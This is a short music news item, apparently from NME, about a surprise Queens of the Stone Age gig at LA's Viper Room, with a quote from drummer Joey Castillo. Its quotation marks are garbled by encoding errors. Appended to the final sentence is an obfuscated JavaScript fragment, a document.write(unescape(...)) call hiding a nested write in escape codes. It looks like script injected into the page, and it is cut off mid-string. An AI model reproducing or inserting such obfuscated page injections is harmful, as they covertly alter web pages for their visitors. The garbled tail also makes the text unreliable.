Queens of the Stone Age played a surprise set in LA on Tuesday night (February 8).
A host of celebrities including Incubus frontman Brandon Boyd, Twiggy Ramirez, Brody Dalle and 'Ocean's 12' actor Scott Cann made it out to the packed gig, held at the last minute at the Viper Room on Sunset Boulevard.
“The idea came up a week or so ago,†drummer Joey Castillo told NME.COM, “We actually asked our booker to kind of set something up and we didn't want to know where or when. We were actually kept in the dark up until about a day before.â€
The group played a 40-minute set of ten songs including ‘Go With The Flow' taken from their back catalogue. QOTSA also played ‘Little Sister', ‘Burn the Witch' and ‘The Long Slow Goodbye' from their new album 'Lullabies to Paralyze', which is due out on March 21 in the UK.document.write(unescape('\04564%6F%63um\145%6Et.%77r%69t\145\04528u%6E\04565s\04563ap\04565\04528\047\045253C%21%5C0\0645\062D%252D\047)\051;
